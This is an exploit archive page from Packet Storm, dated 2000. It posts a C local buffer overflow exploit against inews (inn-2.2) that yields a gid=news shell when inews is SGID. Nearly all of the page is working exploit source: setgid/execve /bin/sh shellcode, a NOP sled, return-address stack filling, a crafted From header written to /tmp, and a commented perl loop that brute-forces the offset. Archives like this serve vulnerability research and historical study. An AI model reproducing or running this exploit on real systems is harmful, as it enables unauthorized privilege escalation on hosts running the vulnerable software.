exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

inews_bof.c

inews_bof.c
Posted Jun 24, 2000
Authored by vade79, realhalo | Site realhalo.org

Inews (inn-2.2) local buffer overflow - provides a gid=news shell if /usr/bin/inews is SGID. Includes perl script to find the offset.

tags | exploit, overflow, shell, local, perl
SHA-256 | b6fc73939a2932fcb984c5650ed44060c75fc8ec9c6504577440ac635fc07b5b

inews_bof.c

Change Mirror Download
/* (linux)inews[inn-2.2] buffer overflow, by Vade79->v9[v9@fakehalo.org].
this will give you a gid=news shell if /usr/bin/inews is SGID(news). i know
/usr/bin/inews comes default with versions of redhat, but i don't know about
other distributions.

cause (line601:inews.c): "(void)strcpy(from, HDR(_from));", use strncpy();

note: i found this while looking for a security hole in another program that
comes with inn, but it needs gid=news to run anyways. so this is a
bonus. also, you may want to clean up the defined TMPFILE afterwords.
after making this, i found another exploit of the same idea, this is
much more functional though.

the old perl script below for offset(s):

#!/usr/bin/perl
$i=$ARGV[0];
while(1){
print "offset: $i.\n";
system("./inews_bof $i");
$i+=100;
} */

#include <stdio.h>
#define NEWSGID 13 // the group id of news.
#define ALIGN 0 // return alignment.
#define PATH "/usr/bin/inews" // path to the inews program.
#define TMPFILE "/tmp/bad.post" // file to overflow inews buffer with.
#define SUBJECT "inews bug." // required file filler.
#define NEWSGROUP "alt.inn.bug" // required file filler.
#define DEFAULT_OFFSET 650 // usual offset.

static char exec[]=
"\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3"
"\x00" // yeah, group id of news here.
"\xcd\x80\x89\x76\x08\x31\xc0\x88\x46\x07"
"\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"
"\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x01"; // hex01 h00t!

long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[600]; // give or take a few. (528)
int i,offset,gid=NEWSGID;
long ret;
FILE *inewsfile;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(esp()-offset);
for(i=ALIGN;i<600;i+=4){*(long *)&bof[i]=ret;}
exec[10]=gid;
for(i=0;i<(600-strlen(exec)-100);i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
unlink(TMPFILE); // clean house.
inewsfile=fopen(TMPFILE,"w");
fprintf(inewsfile,"From: %s\n",bof); // required, woops.
fprintf(inewsfile,"Newsgroups: %s\n",NEWSGROUP); // required.
fprintf(inewsfile,"Subject: %s\n\n",SUBJECT); // required.
fclose(inewsfile);
printf("[ return address: 0x%lx, offset: %d, actual size: %d(sc=%d). ]\n",ret,offset,strlen(bof),strlen(exec));
if(execlp(PATH,"inews","-h",TMPFILE,0)){
printf("%s: failed, is %s the correct path?\n",argv[0],PATH);
exit(-1);
}
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close